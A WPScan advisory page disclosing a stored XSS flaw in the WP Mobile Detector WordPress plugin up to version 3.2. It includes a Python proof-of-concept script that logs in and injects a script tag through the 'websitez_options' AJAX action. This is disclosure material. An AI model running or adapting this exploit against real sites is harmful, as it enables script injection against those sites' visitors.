WP Mobile Detector <= 3.2 - Stored Cross-Site Scripting (XSS)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The WP Mobile Detector plugin exposes the AJAX action ‘websitez_options’ to all registered users on line 78 of wp-mobile-detector/websitez-wp-mobile-detector.php. Providing specially crafted form values will result in a Persistent  XSS attack on Mobile visitors.
Proof of Concept
import requests
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
        "log":"test",
        "pwd":"test",
        "wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
        "action":"websitez_options",
        "general[selected_mobile_theme]":"wz-mobile",
        "general[mobile_title]":"</title><script>alert(1)</script><title>" 
}
r = s.post(url, data=payload)

Affects

Plugin wp-mobile-detector
fixed in version 3.3

References

URL https://research.g0blin.co.uk/g0blin-00050/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 126
Verified No
WPVDB ID 8059

Timeline

Publicly Published 2015-06-25 (over 1 year ago)
Added 2015-06-25 (over 1 year ago)
Last Updated 2015-06-25 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.